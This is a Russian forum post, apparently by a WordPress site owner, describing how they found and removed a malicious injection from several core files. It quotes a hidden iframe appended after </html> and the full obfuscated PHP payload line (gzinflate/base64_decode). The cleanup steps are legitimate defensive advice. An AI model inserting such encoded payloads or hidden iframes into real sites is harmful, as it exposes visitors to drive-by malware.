Вредоносный скрипт на сайтах WordPress
-
Вредоносный скрипт на сайтах WordPress — РЕШЕНИЕ ПРОБЛЕМЫ
Летом были отпуска не было времени заниматься сайтом, а недавно обнаружил, что и опера и яндекс ругаются и называют мой сайт вредносным.
1.Начал расследование… Зашёл в яндекс-вебмастер, чтобы узнать причину и там увидел текст:
«Сайт содержит код, который может быть опасен для посетителей. В результатах поиска сайт выводится с предупреждающей пометкой»
2.Затем в опере просмотрел код страницы (сочетание клавиш Ctrl+u) и обнаружил в конце страницы после закрывающего тега </html> код фрема вида:
</html><iframe frameborder=0 height=1 width=1 scrolling=no src='http://*****.com/'> </iframe><iframe frameborder=0 height=1 width=1 scrolling=no src='http://*****.com/'> </iframe>
3. Начал поиски способа его удаления. Для начала скачал и установил плагин TAC . но этот плагин искал вредоносный код только в файлах темы, да и то не всегда успешно. Зато благодаря ему определил текст эттьго вредносного кода. Ключевым словом в нём было base64 , по кторому удалось потом его полностью найти и удалить вручную.
4. Удаление кода — Заходим в FTP – вводим Сочетание клавиш alt+F7 – затем Общие параметры – с текстом –и ищем текст base 64
У меня нескольког блогов на WP везде были заражены одни и те же файлы:index.php
wp-app.php
wp-blog-header.php
wp-login.phpКопируем эти файлы на комп, открываем в блокноте, находим текст (можно просто икать base64 ) :
#32d494# echo(gzinflate(base64_decode("Jcw9DoAgDEDhq3Rjs7oa4S4ClRL5MaWJ19fo8r7tbfmQvRJ89V0iiZ2BKSdWu8Cdo/LrCNJLyS3Z1mFIsIZVrxXRn9VPjRQNONjwv7kH"))); #/32d494#
Удаляем эту хрень, сохраняем файл и перезаливаем ВСЁ на сервер.
5. Через браузер Opera и сочетание клавиш Ctrl+u проверяем все ли нормально.
6. После решения проблемы через яндекс-вебмастер отправляем сайт на перепроверку и также меняем коды FTP-доступа через Total Commander.
Все ок. Надеюсь это будет кому полезно – я не веб-мастер любитель и у меня ушло пол дня, чтобы решить эту проблему!! Всем удачи!!
- Тема «Вредоносный скрипт на сайтах WordPress» закрыта для новых ответов.